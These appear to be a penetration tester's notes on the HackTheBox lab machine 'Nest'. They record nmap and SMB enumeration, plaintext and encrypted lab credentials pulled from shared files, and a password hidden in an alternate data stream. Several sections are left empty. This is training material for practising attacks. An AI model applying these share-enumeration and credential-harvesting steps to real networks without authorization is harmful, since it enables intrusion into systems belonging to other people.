HackTheBox · Lab
Nest

Nest

EasyWindowsPassword Attacks

Nest.pdf

notes

NMAP

```shell
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     Reporting Service V1.2
|     Unrecognised command
|   Help: 
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-07-29T08:15:01
|_  start_date: 2025-07-29T08:08:30
```

SMB

After full spidering we found several files.


We also mounted all the shares


10.10.10.178-Data_Shared_Templates_HR_Welcome Email.txt


```shell
Username: TempUser
Password: welcome2019
```


With new creds, even more files were found.


//Share/Users


```shell
./Users
    dr--r--r--                0 Sun Jan 26 00:04:21 2020	.
    dr--r--r--                0 Sun Jan 26 00:04:21 2020	..
    dr--r--r--                0 Wed Jul 21 20:47:04 2021	Administrator
    dr--r--r--                0 Wed Jul 21 20:47:04 2021	C.Smith
    dr--r--r--                0 Thu Aug  8 19:03:29 2019	L.Frost
    dr--r--r--                0 Thu Aug  8 19:02:56 2019	R.Thompson
    dr--r--r--                0 Wed Jul 21 20:47:15 2021	TempUser
```


//share/Data


```shell
Data/Shared
Data/IT/Configs/Adobe/editing.xml
Data/IT/Configs/Adobe/Options.txt
Data/IT/Configs/Adobe/projects.xml
Data/IT/Configs/Adobe/settings.xml
Data/IT/Configs/Atlas/Temp.XML
Data/IT/Configs/Microsoft/Options.xml
Data/IT/Configs/NotepadPlusPlus/config.xml
Data/IT/Configs/NotepadPlusPlus/config.xml
Data/IT/Configs/NotepadPlusPlus/shortcuts.xml
Data/IT/Configs/NotepadPlusPlus/shortcuts.xml
Data/IT/Configs/RU Scanner/RU_config.xml
Data/IT/Configs/RU Scanner/RU_config.xml
Data/Shared/Maintenance/Maintenance Alerts.txt
Data/Shared/Templates/HR/Welcome Email.txt
```


10.10.10.178-Data_IT_Configs_RU Scanner_RU_config.xml


```shell
<Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
```


[//10.10.10.178/Data/IT/Configs/NotepadPlusPlus/config.xml](https://10.10.10.178/Data/IT/Configs/NotepadPlusPlus/config.xml)


```shell
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
```


Looks interesting!


After we mounted `secure$` we noticed we can’t change directory into `IT` due to none permissions, but, if we change directly into `IT/Carl` we have success.


smbmount/IT/Carl 


```shell
drwxr-xr-x - root  7 Aug  2019  Docs
drwxr-xr-x - root  6 Aug  2019  Reports
drwxr-xr-x - root  6 Aug  2019  'VB Projects'
```

Visual Studio

![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/fe09db70-bf46-47d4-a673-07af609effc1/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466WRYPCUCX%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082834Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGEaCXVzLXdlc3QtMiJHMEUCIQCQoCIuBsuaii6Vf3Bl1z7qk6q7%2BUSSytt0HkUErYvNEAIgDuJ%2FDWDkt49SBZt0umLzVI2WHYeJUtR5T3%2FqiXGJvBsq%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDBz9RCCFIMnmvJZ6PyrcAw9HFSDPS2JkdVg4tyGcBK8HPHCaL7Vov4x3av5CUq6PHeIrZx8uvRGJzwZKL6Ca5mRhRGeOLrI3KWU9%2BDu6MGSm3O4nrod6VGxAQO%2BGdSxvfHk0wQNXJhIOW%2BE6pH1RzSBldc5LtOe%2Fo7K8iJRi%2Fm%2BtZJcoWKsD89Bj6GOCSDcazZvMKrvVtiJzOJRV5T93ZqnA0Hb6rC7ls8o2Oat96T4htfU%2FGDkXTNvUJCgIZwWsdzRl3QcK6Ygo8WqLH4iqqP5U2Y5OgF2UHo8S6vJulqwKaeXDMgbf52IceQHtKPkUGUZDq%2BlvGTZSBQaQnKU908m6jzYnUqXWIxRki3SQmPHAdXbtJ775m%2FQKYVgV3eikHWzIDVd8YvId3EBrkFZpBq5st%2FD%2BdE523v8rt4T0%2F%2FSHciSRUfbOp1Q%2BJLtmJvRFLADHB5h%2FnU7%2FR67fN6fp%2B15O1%2BQrJK2%2FbTZRfAhOyR5jCJX2dB1MzA0PmWKoqUV0JHxQGxlLpgNc42h2FX3eMiTwzhPn%2BC6w3G8fT%2B0E2E7cXBB%2B6bO23YAziI4uUHUM%2B5wAr3feNs25UY4S1bHd%2BHefkMssvNR5yaRbinlsVF%2FAPvsLHkfszDLxCrOiYxkjkQJFzZg%2BEA85%2BHZgMPmEus0GOqUBi8KmvNQWcxjnou8cbOG8W%2B8vvzNs8jJ2%2BMVpE%2Bd9Gk0jH9EJk8EQpztnhKZGcMK4t1qvIRW2BYg3gQwlCOxUJJduSD1RFFxy14LvnMbqNpU8cTpe100FLLeCGGKF9QLctDqNAXdCCz2UIcJEbqmyktme02eqPs9RFh2C5Dd3V96cWvkidm2mQyl0ulm8IdXtpj69tp3CF1wN5LWymxzqFulONdb2&X-Amz-Signature=7c1aa9c37551d51c612bbdb391bc7d5c80971e414dede61d9d725a2e136f98ef&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


After some examination in code we could finally withdraw our decrypted string


![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/d220337c-3fbd-4f2b-a284-438ef9190095/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB46647GTB76Y%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082834Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJIMEYCIQCYaTi9zx49mPQ0adA5P2NYELnCRSeCw7CT2ISNL8IyCgIhALCouQcsjvX5hbUtKO2fe6K99EGUHRc9HYYTmVNbp5j0Kv8DCCkQABoMNjM3NDIzMTgzODA1IgyWeej9LdIWmKc53mUq3AOWeliLohszz8IKwSvsz2yt92UBKjtU1PMKgUkxT9%2Fe07ZF624okUQIYlR6CDil15GY8YsB1hLb0dQZo%2BN%2FfP3l9537RRPMEVA%2FnifR1QjOr8Tiblb3LBtzm4aS7gZ5Mm%2BsOm23aiJlngTt5ZW2DvvryaJIGQhpc5EKuuC17hsCd6pgyzqVU7rEbjb%2FF8QuY5vYwFtz9mPxSFmLaBKbTZaPAGZNh3dtbZ6MCuV5xtF3ourKBvarOVMGLBgHfJK29OMeXJaRiISq4rdJf0N84Hj5eIKCF6Qqjn1dPzykSrV6pOBs5x0JDmMJtEyyeDLH6kL7QoReCD%2FZweISakD4R6YlXph6u%2FzomqFUEyV95wWq6wg%2Fxs2Jx84wcVEaNKGD%2B2FDSTTsd2d3HPssJGlmBFLtI%2FrqapOVdHOc1V8m6BcLQ9dtIxISln87XirsL13jmwpfPjVj12U7b3DuirW5Rvo7hygIIng0IXnTaRT9BTB%2B%2BYNyr5YeNoB%2BJzPK2m355zGOxR%2F8A7dERd0iK9GFRFT3j%2FWQOlLl8LJawVzBBKOabIE2CeV%2FBeWkzVEdOjCcaoKt5IuxYFzvUEjC6wTYi4OFpPtHw3nx%2BTt2RGVDlcAGvtFslzEWzAU%2FVOnVDzDz87nNBjqkAbjbim7nwblc9Ewfw3cbLNqupFInYkxV7HjYmtCK2u0Td%2Bmbu8X7G6wZy9gQD8q8CP9t2ZY59osgsIKg3%2Fx%2F1Qt6PyTD0afYYcGq8Wo7kySV9YgfHsgqM3%2BNTbsISyjD%2Ba4FKech0P023E9XWOn9yQ1tcJoOtVG7WKv671Iga5kSMeiXdA%2B1k3giVK%2Faj5poUW2dyvAV0qPOiUGwmJPZQwprndAZ&X-Amz-Signature=facd7db3b647cb3a2a71422cd9d52c6a9579ff8b7163c33f5411d4d7dfd7a9ab&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)

- `xRxRxPANCAK3SxRxRx`

And we have auth success with `c.smith`

SMB

We now have access to //Users/C.smith


![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/dbcfaf30-5127-41a5-a9e0-1d2d43d4ae89/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466U7VEGAPA%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082835Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJHMEUCIE2Kf4Wqzc66IuatMPmUAb5OxS7Msdwb4JKqTRl%2Ffp2sAiEAoE4lWo38Uf3WHF4aMyTtwm8jfLuLu71qCU00C4wDvMIq%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDDGFZdoHiaOCdSCDbircA6Af%2BHEgxCELwDWoqMhhPjmrnenPv4hoVpDepzkbXeL05s%2BZg33gZbiLknzZLmbANg%2Ff%2But8R4J7j7thgbI6xX3F6N2H9%2F5wcaqHAroXmR%2Bt8c5%2FzEzwnTT3t5uZiTyQ%2Bbgq1RgA5racDgdxmDJuD5DTvxQxLtIEGgRX3feVzQv3nYC8rd%2BtSLbZnXn%2Fqbh4MnAc%2FXW%2F1cGvOgnK0v6cbhIZdqnvBCWcRRoB%2B91cxFhJlFtrRyR3o3vXlhoaSfRnq%2FxF5fSvrMeaY8xpv2pzqyKgg%2FcA9GnNdf75pXjPigBQm6bVWR7CbZaYPeWYH5rJXNlU6vzajqisTKh0n0Vx4HiEGix4QEoxt6LMm7lEpgbBc%2BpToRQRaVBvEvuB1jVFDkbVzN1YWuPnSX2UoaalzLdjcHi2rZpcUu9SBaD4dwFWih26hxQD8QwQBhM4XDW%2BzE%2ByLpxuEon%2FDbkG6mikco2McE1Wjt5sTZQfAn4dsH8Z47OoTymbO9PTShblaDqRO5GLt9AkqiItu%2BSnE5C7VIn5gXUlOyq8OWiAY%2F7tZRtJEdvbjbrTc7da4Csgk%2BrajBVZ4zHO2MAcw5UAmSkX9N2FvJ7PWfcP6%2BHUoFKQ475nCPbovg3%2FniCPiFp9MO7zuc0GOqUBwlre3FTjlnhiLRHukJa3LX8FY%2FcRE530rqUSGolhNvuE%2BV3apgXGhSr6mZiUcAvpo4tC02Bz6B4GnLBbjDdLO7%2Bsj7VStCZ8Zzwmde9ghNU4eZo8dQXoUVvgHUEDA0hF9R7WVq7aMUq0nxPFUApxoP0jgQ3mT7DsEndmuGLbSk0z1slse%2Ffiw2iVOgvBcuTDI7qkptJ1%2F9ZcqS0EyzP9oYSp7ZXr&X-Amz-Signature=1f7e969a5024714f525e87e202a22078ac60ca916c9b701c9777738c75178031&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


After alot of recon we can see that one file has an alternate data stream.


```shell
smb: \C.Smith\HQK Reporting\> Allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Fri Aug  9 01:06:12 2019 CEST
access_time:    Fri Aug  9 01:06:12 2019 CEST
write_time:     Fri Aug  9 01:08:17 2019 CEST
change_time:    Wed Jul 21 20:47:12 2021 CEST
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
```


Lets download file and check it


```shell
drwxr-xr-x   - root 29 Jul 11:54  'AD Integration Module'
.rwxr-xr-x   0 root  9 Aug  2019  'Debug Mode Password.txt'
.rw-r--r--  15 root 29 Jul 12:24  'Debug Mode Password.txt:Password'
.rwxr-xr-x 249 root  9 Aug  2019 󰗀 HQK_Config_Backup.xml
❯ cat Debug\ Mode\ Password.txt:Password

WBQ201953D8w
```

PORT 4386 w/ TELNET

```shell
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
```

Compiling the HqkLdap.exe

![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/40c4290c-540c-4aff-9776-2b95ca96aae5/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB4664R5FNAKX%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082835Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJHMEUCIQC0RLE5SSbZqsBiim2Xo0kYWjl9HMypr9x%2FYd6036DzCQIgVrymOw0Vf5Nf%2B%2FeAcCEtqrgTojQB%2FKyxBoOwnorMY6wq%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDOnB8VnscUTlWH4nnircA1hTrnnDvb3%2FqMc%2BISWy3pCR2Asmgy%2F8AkoVUWzZvTwZCBsAx4Q77WppvPzzbHdDuGRrK91TxVp99NQwReJMX%2FF8kXk8clXO97pbnFK8y72XHPE6cXI1E0fpZOWOqbaed6WaBMMraeaShhoBIRknelHQB3hxu05CIvRstJuunJe%2FNKRJ65osYzHK2gx1wfhuihKWfJUSv8VuYEhhiAWVYz1VqZIixddgpDjlVFWi2Z7B6YqS1qLhwnvfwxLavW5i%2BpkfjnDAQVAewIkr3XnVD4SoLKUpA0bwtaFt4uEzxCeSfw%2BC7D9txstxkPRi7%2F4TYJlS0lDljB1l1T2t3krcKztt3W3y1Z8Pp8Ysw3z%2FI1DgU5vZreWeYEn%2FF%2BV3FZZv5xkL3TWpHNalHNV4ZoLMKVx97Oeon%2ByEwPhgDMD5hfp%2B5hkvsx4Il6RAYKtpgBZMTr7JFk3bqigfJr5yn%2FCraEnbNKwtfsWkWZ04ixTZQUcqjoiQxdIb4quE7XUT0YRB5nRsJ9Ii5%2BiDkOdp%2FhY3S1yIwWb7OSTVf%2FO2fHaRJgJOOHJh3861onU8eV9QbyEJMfV84c97HyHITv2pY%2F%2B21hF5V7vyxnZtf6uGUr2J%2FnqT3k2rvRtIP%2FFrzAhrMO%2Fzuc0GOqUB3Y%2BamOtZZzUvKfb%2BxxQIG4Gn2hFj10sz4uC8tsJj4ENYj4EgVZWlSVAk4yQHVgAhYcedlrmQ%2F1Ma0MR16b0EIqknrsTZ8TU1OOn1aH0DYe%2Bzi9uNjmgeibVGhh8HeRNPmXjW5PRg%2FzFoxbIrTnUgtxS2bkBdp%2Fmx4Gm3zB0T5MqAtReABl2xHjsUEXa9hajsbamGpGX7WMJ3HVDkPMyuFCA%2BKBN9&X-Amz-Signature=cf250b4fc03be46cab143a242550ad1d5b3d22a866e5778913481c880a685224&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/66c7dc73-aa5b-401e-8fdb-1e9105ef02ff/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB4664R5FNAKX%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082835Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJHMEUCIQC0RLE5SSbZqsBiim2Xo0kYWjl9HMypr9x%2FYd6036DzCQIgVrymOw0Vf5Nf%2B%2FeAcCEtqrgTojQB%2FKyxBoOwnorMY6wq%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDOnB8VnscUTlWH4nnircA1hTrnnDvb3%2FqMc%2BISWy3pCR2Asmgy%2F8AkoVUWzZvTwZCBsAx4Q77WppvPzzbHdDuGRrK91TxVp99NQwReJMX%2FF8kXk8clXO97pbnFK8y72XHPE6cXI1E0fpZOWOqbaed6WaBMMraeaShhoBIRknelHQB3hxu05CIvRstJuunJe%2FNKRJ65osYzHK2gx1wfhuihKWfJUSv8VuYEhhiAWVYz1VqZIixddgpDjlVFWi2Z7B6YqS1qLhwnvfwxLavW5i%2BpkfjnDAQVAewIkr3XnVD4SoLKUpA0bwtaFt4uEzxCeSfw%2BC7D9txstxkPRi7%2F4TYJlS0lDljB1l1T2t3krcKztt3W3y1Z8Pp8Ysw3z%2FI1DgU5vZreWeYEn%2FF%2BV3FZZv5xkL3TWpHNalHNV4ZoLMKVx97Oeon%2ByEwPhgDMD5hfp%2B5hkvsx4Il6RAYKtpgBZMTr7JFk3bqigfJr5yn%2FCraEnbNKwtfsWkWZ04ixTZQUcqjoiQxdIb4quE7XUT0YRB5nRsJ9Ii5%2BiDkOdp%2FhY3S1yIwWb7OSTVf%2FO2fHaRJgJOOHJh3861onU8eV9QbyEJMfV84c97HyHITv2pY%2F%2B21hF5V7vyxnZtf6uGUr2J%2FnqT3k2rvRtIP%2FFrzAhrMO%2Fzuc0GOqUB3Y%2BamOtZZzUvKfb%2BxxQIG4Gn2hFj10sz4uC8tsJj4ENYj4EgVZWlSVAk4yQHVgAhYcedlrmQ%2F1Ma0MR16b0EIqknrsTZ8TU1OOn1aH0DYe%2Bzi9uNjmgeibVGhh8HeRNPmXjW5PRg%2FzFoxbIrTnUgtxS2bkBdp%2Fmx4Gm3zB0T5MqAtReABl2xHjsUEXa9hajsbamGpGX7WMJ3HVDkPMyuFCA%2BKBN9&X-Amz-Signature=53fb9755bcf2d68627f23442b0ad3770d8904063695b992bf3dd915b96e9400c&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)

Admin password

image.png

image.png

image.png

Scope

OS

Windows 7 / Server 2008 R2 Build 7601

FQDN / DOMAIN

HTB-NEST.HTB-NEST

Users

Administrator
C.Smith
Guest
Service_HQK
TempUser
l.frost
r.thompson

Credentials

TempUser:welcome2019
c.smith:xRxRxPANCAK3SxRxRx
P4386 debug password:WBQ201953D8w
administrator:yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

NMAP

PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     Reporting Service V1.2
|     Unrecognised command
|   Help: 
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-07-29T08:15:01
|_  start_date: 2025-07-29T08:08:30

SMB Shares as TempUser

Share           Permissions     Remark
-----           -----------     ------
ADMIN$                          Remote Admin
C$                              Default share
Data            READ            
IPC$                            Remote IPC
Secure$         READ            
Users           READ

Web Services Enumeration

Web Technology

[+] Nikto

[+] Wfuzz

Other Notes

Privilege Escalation

Takeaway Concepts

Alot of debugging and decoding

Logs

file

SMB_spidering_2025-07-29_10-15-38.log